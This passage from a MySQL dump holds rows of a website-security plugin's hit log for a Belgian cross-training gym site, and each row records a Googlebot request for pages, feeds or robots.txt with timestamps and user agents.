(78112, 1537138732.556541, 1123631237, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78113, 1537138733.100746, 1123631237, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78114, 1537438436.420693, 1123635141, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78115, 1537438436.981211, 1123635141, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78116, 1537440615.293121, 1123635141, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78117, 1537448475.373243, 1123635141, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78118, 1537452699.382450, 1123635141, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78119, 1537460551.220159, 1123635141, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78120, 1537473207.226795, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78121, 1537484689.911692, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78122, 1537508237.986949, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78123, 1537524776.953056, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78124, 1537542242.159443, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78125, 1537542242.696894, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78126, 1537569522.451786, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78127, 1537574991.795198, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78128, 1537598445.968548, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78129, 1537603260.898655, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78130, 1537629827.979090, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78131, 1537629828.480641, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78132, 1537636486.038939, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78133, 1537647937.258829, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78134, 1537654586.484520, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78135, 1537661233.380673, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78136, 1537670848.127105, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78137, 1537675705.367288, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78138, 1537679915.388468, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78139, 1537688950.491599, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78140, 1537698639.876534, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78141, 1537702288.128961, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78142, 1537711368.363739, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78143, 1537721018.381071, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78144, 1537721018.991351, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78145, 1537732973.680745, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78146, 1537974092.323517, 1123632542, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78147, 1537974092.832625, 1123632542, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78148, 1537978290.387294, 1123632542, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78149, 1537993321.694021, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78150, 1538000633.689510, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78151, 1538010288.572281, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78152, 1538021750.571457, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78153, 1538052552.720917, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78154, 1538061412.648019, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78155, 1538061413.193521, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78156, 1538069893.705707, 1123631525, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78157, 1538077703.186013, 1123631525, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78158, 1538095835.619145, 1123631525, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(78159, 1538102466.320531, 1123631525, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78160, 1538102466.949560, 1123631525, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78161, 1538448830.048692, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78162, 1538532017.885361, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78163, 1538571168.598792, 1123631772, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78164, 1538571169.321508, 1123631772, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78165, 1538608457.322951, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78166, 1538632933.381126, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78167, 1538635324.904624, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78168, 1538635325.569537, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78169, 1538635417.593920, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78170, 1538635428.441810, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78171, 1538637728.463981, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78172, 1538644327.514088, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78173, 1538669540.581456, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78174, 1538669541.097466, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78175, 1538669581.698656, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78176, 1538669655.752239, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78177, 1538669720.491657, 1123631752, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78178, 1538669956.817489, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78179, 1538672714.413938, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78180, 1538672714.994510, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78181, 1538672763.638233, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78182, 1538673914.811498, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78183, 1538677514.446423, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78184, 1538686551.670279, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78185, 1538721759.969601, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78186, 1538753793.902555, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78187, 1538756810.669623, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78188, 1538756811.137134, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78189, 1538895631.561071, 1123632581, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78190, 1538895632.101716, 1123632581, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78191, 1538930108.145168, 1123632581, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78192, 1538968076.571330, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78193, 1539024211.800702, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78194, 1539024212.298662, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78195, 1539076170.462455, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78196, 1539116081.817827, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78197, 1539116082.351841, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78198, 1539212986.229888, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78199, 1539288800.821596, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
